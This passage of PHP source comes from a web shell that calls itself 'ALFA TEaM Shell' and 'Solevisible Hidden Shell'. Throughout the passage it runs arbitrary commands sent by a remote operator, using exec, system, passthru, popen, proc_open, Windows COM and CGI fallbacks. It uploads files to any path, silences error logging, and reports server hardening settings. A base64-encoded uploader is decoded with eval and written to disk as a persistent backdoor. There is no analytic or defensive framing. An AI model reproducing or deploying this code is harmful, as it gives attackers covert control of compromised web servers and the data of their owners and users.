            if (strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]<pre>"+output+"</pre>') === false) {
                if ($set_cookie) {
                    __alfa_set_cookie("alfacgiapi", $lang);
                }
                if (@preg_match("/<pre>(.*?)<\\/pre>/s", $data, $res)) {
                    $out = $res[1];
                }
            } elseif ($lang == "perl") {
                return _alfa_cgicmd($cmd_pure, "py", $set_cookie);
            } elseif ($lang == "py") {
                return _alfa_cgicmd($cmd_pure, "bash", $set_cookie);
            } elseif ($lang == "bash" && $GLOBALS['sys'] == "win") {
                return _alfa_cgicmd($cmd_pure, "aspx", $set_cookie);
            } else {
                if ($set_cookie) {
                    __alfa_set_cookie("alfacgiapi_mode", "off");
                }
            }
            return trim($out);
        } else {
            return "";
        }
    }
    function alfaGetCwd()
    {
        if (function_exists("getcwd")) {
            return @getcwd();
        } else {
            return dirname($_SERVER["SCRIPT_FILENAME"]);
        }
    }
    function alfaEx($in, $re = false, $cgi = true, $all = false)
    {
        $data = _alfa_php_cmd($in, $re);
        if (empty($data) && $cgi || $all) {
            if ($GLOBALS['sys'] == 'unix') {
                if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) {
                    $cmd = _alfa_cgicmd($in);
                    if (!empty($cmd)) {
                        return $cmd;
                    }
                }
            }
        }
        return $data;
    }
    function _alfa_php_cmd($in, $re = false)
    {
        $out = '';
        try {
            if ($re) {
                $in .= " 2>&1";
            }
            if (function_exists('exec')) {
                @exec($in, $out);
                $out = @join("\n", $out);
            } elseif (function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $out = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                @system($in);
                $out = ob_get_clean();
            } elseif (function_exists('shell_exec')) {
                $out = shell_exec($in);
            } elseif (function_exists("popen") && function_exists("pclose")) {
                if (is_resource($f = @popen($in, "r"))) {
                    $out = "";
                    while (!@feof($f)) {
                        $out .= fread($f, 1024);
                    }
                    pclose($f);
                }
            } elseif (function_exists('proc_open')) {
                $pipes = array();
                $process = @proc_open($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
                $out = @stream_get_contents($pipes[1]);
            } elseif (class_exists('COM')) {
                $alfaWs = new COM('WScript.shell');
                $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
                $stdout = $exec->StdOut();
                $out = $stdout->ReadAll();
            }
        } catch (Exception $e) {
        }
        return $out;
    }
    function _alfa_fsockopen($server, $uri, $post)
    {
        $socket = @fsockopen($server, 80, $errno, $errstr, 15);
        if ($socket) {
            $http = "POST {$uri} HTTP/1.0\r\n";
            $http .= "Host: {$server}\r\n";
            $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
            $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
            $http .= "Content-length: " . strlen($post) . "\r\n";
            $http .= "Connection: close\r\n\r\n";
            $http .= $post . "\r\n\r\n";
            fwrite($socket, $http);
            $contents = "";
            while (!@feof($socket)) {
                $contents .= @fgets($socket, 4096);
            }
            list($header, $body) = explode("\r\n\r\n", $contents, 2);
            @fclose($socket);
            return $body;
        } else {
            return "";
        }
    }
    if (isset($_GET["solevisible"])) {
        @error_reporting("\x00\x00\x0f\x03\x18");
        echo "<html>";
        echo "<title>Solevisible Hidden Shell</title>";
        echo "<body bgcolor=#000000>";
        echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
        $safe_mode = @ini_get('safe_mode');
        if ($safe_mode) {
            $r = "<b style='color: red'>On</b>";
        } else {
            $r = "<b style='color: green'>Off</b>";
        }
        echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>PHP_OS</font><br>";
        echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
        echo "PHP Version: <font color=white>PHP_VERSION</font><br />";
        echo "PWD:<font color=#FFFFFF> " . str_replace("\\", "/", @alfaGetCwd()) . "/<br />";
        echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>";
        echo "<font color=#7CFC00>Disable functions : </font>";
        $disfun = @ini_get('disable_functions');
        if (empty($disfun)) {
            $disfun = '<font color="green">NONE</font>';
        }
        echo "<font color=red>";
        echo "{$disfun}";
        echo "</font><br>";
        echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
        echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???') . "</font><br><p>";
        echo "<hr><center><form onSubmit=\"this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));\" action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
        echo 'CWD: <input type="text" name="cwd" value="' . str_replace("\\", "/", @alfaGetCwd()) . '/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
        if (isset($_FILES['file'])) {
            if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']) . '/' . $_FILES['file']['name'])) {
                echo "<b><font color=\"#7CFC00\"><center>Upload Successfully ;)</font></a><font color=\"#7CFC00\"></b><br><br></center>";
            } else {
                echo "<center><b><font color=\"#7CFC00\">Upload failed :(</font></a><font color=\"#7CFC0\"></b></center><br><br>";
            }
        }
        echo "<hr><form onSubmit=\"this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));\" method=\"POST\">Execute Command: <input name=\"command_solevisible\" value=\"\" size=\"59\" type=\"text\" align=\"left\" ><input name=\"execute\" value=\"Execute\" type=\"submit\"><br></form>\r\n<hr><pre>";
        if (isset($_POST['command_solevisible'])) {
            if (strtolower("PHP") == "win") {
                $separator = '&';
            } else {
                $separator = ';';
            }
            $solevisible = "cd '" . addslashes(str_replace("\\", "/", @alfaGetCwd())) . "'" . $separator . "" . __ZGVjb2Rlcg($_POST['command_solevisible']);
            echo alfaEx($solevisible);
        }
        echo "</pre>\r\n</body></html>";
        exit;
    }
    @error_reporting("\x00\x00\x0f\x03\x18");
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('magic_quotes_runtime', 0);
    @set_time_limit(0);
    if (function_exists('set_magic_quotes_runtime')) {
        @set_magic_quotes_runtime(0);
    }
    foreach ($_POST as $key => $value) {
        if (is_array($_POST[$key])) {
            $i = 0;
            foreach ($_POST[$key] as $f) {
                $f = trim(str_replace(' ', '+', $f));
                $_POST[$key][$i] = decrypt_post($f);
                $i++;
            }
        } else {
            $value = trim(str_replace(' ', '+', $value));
            $_POST[$key] = decrypt_post($value);
        }
    }
    $default_action = 'FilesMan2';
    //'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    if (strtolower("PHP") == "win") {
        $GLOBALS['sys'] = 'win';
    } else {
        $GLOBALS['sys'] = 'unix';
    }
    $GLOBALS['home_cwd'] = @alfaGetCwd();
    $GLOBALS["need_to_update_header"] = "false";
    $GLOBALS['glob_chdir_false'] = false;
    if (isset($_POST['c'])) {
        if (!@chdir($_POST['c'])) {
            $GLOBALS['glob_chdir_false'] = true;
        }
    }
    $GLOBALS['cwd'] = isset($_POST['c']) && @is_dir($_POST['c']) ? $_POST['c'] : @alfaGetCwd();
    if ($GLOBALS['glob_chdir_false']) {
        $GLOBALS['cwd'] = isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd();
    }
    if ($GLOBALS['sys'] == 'win') {
        $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
        $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
    }
    if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) - 1] != '/') {
        $GLOBALS['cwd'] .= '/';
    }
    if (!function_exists('sys_get_temp_dir')) {
        function sys_get_temp_dir()
        {
            foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {
                if ($temp = getenv($env_var)) {
                    return $temp;
                }
            }
            $temp = tempnam($GLOBALS['__file_path'], '');
            if (_alfa_file_exists($temp, false)) {
                unlink($temp);
                return dirname($temp);
            }
            return null;
        }
    }
    if (!function_exists("mb_strlen")) {
        function mb_strlen($str, $c = "")
        {
            return strlen($str);
        }
    }
    if (!function_exists("mb_substr")) {
        function mb_substr($str, $start, $end, $c = "")
        {
            return substr($str, $start, $end);
        }
    }
    define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? @is_writable(str_replace('\\', '/', sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable('.') ? '.' : false) : false);
    function alfahead()
    {
        $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
        $alfa_uploader = "\$x = base64_decode(\"PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+\");\$solevisible = fopen(\"solevisible.php\",\"w\");fwrite(\$solevisible,\$x);";
        define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))");
        if (!isset($_POST['ajax'])) {
            function Alfa_GetDisable_Function()
            {
                $disfun = @ini_get('disable_functions');
                $afa = '<span class="header_show_all">All Functions Accessible</span>';
                if (empty($disfun)) {
                    return "<span class=\"header_show_all\">All Functions Accessible</span>";
                }
                $s = explode(',', $disfun);
                $s = array_unique($s);
                $i = 0;
                $b = 0;
                $func = array('system', 'exec', 'shell_exec', 'proc_open', 'popen', 'passthru', 'symlink', 'dl');
                $black_list = array();
                $allow_list = array();
                foreach ($s as $d) {
                    $d = trim($d);
                    if (empty($d) || !is_callable($d)) {
                        continue;
                    }
                    if (!function_exists($d)) {
                        if (in_array($d, $func)) {
                            $dis .= $d . " | ";
                            $b++;
                            $black_list[] = $d;
                        } else {
                            $allow_list[] = $d;
                        }
                        $i++;
                    }
                }
                if ($i == 0) {
                    return $afa;
                }
                if ($i <= count($func)) {
                    $all = array_values(array_merge($black_list, $allow_list));
                    return '<span class="disable_functions">' . implode(" | ", $all) . '</span>';
                }
                return '<span class="disable_functions">' . $dis . '</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All (' . $i . ')</span></a>';
            }
            function AlfaNum()
            {
                $args = func_get_args();
                $alfax = array();
                $find = array();
                for ($i = 1; $i <= 10; $i++) {
                    $alfax[] = $i;
                }
                foreach ($args as $arg) {
                    $find[] = $arg;
                }
                echo "<script>";
                foreach ($alfax as $alfa) {
                    if (in_array($alfa, $find)) {
                        continue;
                    }
                    echo 'alfa' . $alfa . "_=";
                }
                echo "\"\"</script>";
            }
            if (empty($_POST['charset'])) {
                $_POST['charset'] = $GLOBALS['default_charset'];
            }
            $freeSpace = function_exists('diskfreespace') ? @diskfreespace($GLOBALS['cwd']) : '?';
            $totalSpace = function_exists('disk_total_space') ? @disk_total_space($GLOBALS['cwd']) : '?';
            $totalSpace = $totalSpace ? $totalSpace : 1;
            $on = "<span class='header_on'> ON </span>";
            $of = "<span class='header_off'> OFF </span>";
            $none = "<span class='header_none'> NONE </span>";
            if (function_exists('ssh2_connect')) {
                $ssh2 = $on;
            } else {
                $ssh2 = $of;
            }
            if (function_exists('curl_version')) {
                $curl = $on;
            } else {
                $curl = $of;
            }
            if (function_exists('mysql_get_client_info') || class_exists('mysqli')) {
                $mysql = $on;
            } else {
                $mysql = $of;
            }
            if (function_exists('mssql_connect')) {
                $mssql = $on;
            } else {
                $mssql = $of;
            }
            if (function_exists('pg_connect')) {
                $pg = $on;
            } else {
                $pg = $of;
            }
            if (function_exists('oci_connect')) {
                $or = $on;
            } else {
                $or = $of;
            }
            if (@ini_get('disable_functions')) {
                $disfun = @ini_get('disable_functions');
            } else {
                $disfun = "All Functions Enable";
            }
            if (@ini_get('safe_mode')) {
                $safe_modes = "<span class='header_off'>ON</span>";
            } else {
                $safe_modes = "<span class='header_on'>OFF</span>";
            }
            $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>";
            if (@ini_get('open_basedir')) {
                $basedir_data = @ini_get('open_basedir');
                if (strlen($basedir_data) > 120) {
                    $open_b = substr($basedir_data, 0, 120) . "...";
                } else {
                    $open_b = $basedir_data;
                }
            } else {
                $open_b = $none;
            }
            if (@ini_get('safe_mode_exec_dir')) {
                $safe_exe = @ini_get('safe_mode_exec_dir');
            } else {
                $safe_exe = $none;
            }
            if (@ini_get('safe_mode_include_dir')) {
                $safe_include = @ini_get('safe_mode_include_dir');
            } else {
                $safe_include = $none;
            }
            if (!function_exists('posix_getegid')) {
                $user = function_exists("get_current_user") ? @get_current_user() : "????";
                $uid = function_exists("getmyuid") ? @getmyuid() : "????";
                $gid = function_exists("getmygid") ? @getmygid() : "????";
                $group = "?";
            } else {
                $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????");
                $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????");
                $user = $uid['name'];
                $uid = $uid['uid'];
                $group = $gid['name'];
                $gid = $gid['gid'];
            }
            $cwd_links = '';
            $path = explode("/", $GLOBALS['cwd']);
            $n = count($path);
            for ($i = 0; $i < $n - 1; $i++) {
                $cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
                $cach_cwd_path = "";
                for ($j = 0; $j <= $i; $j++) {
                    $cwd_links .= $path[$j] . '/';
                    $cach_cwd_path .= $path[$j] . '/';
                }
                $cwd_links .= "\")' path='" . $cach_cwd_path . "' href='#action=fileman&path=" . $cach_cwd_path . "'>" . $path[$i] . "/</a>";
            }
            $drives = "";
            foreach (range('a', 'z') as $drive) {
                if (@is_dir($drive . ':\\')) {
                    $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
                }
            }
            $csscode = '	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
            echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="' . __showicon('alfamini') . '" rel="icon" type="image/x-icon"/>
<title>..:: ' . $_SERVER['HTTP_HOST'] . ' ~ ALFA TEaM Shell - v' . __ALFA_VERSION__ . '-' . __ALFA_CODE_NAME__ . ' ::..</title>
<style type="text/css">';
            ?>
.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 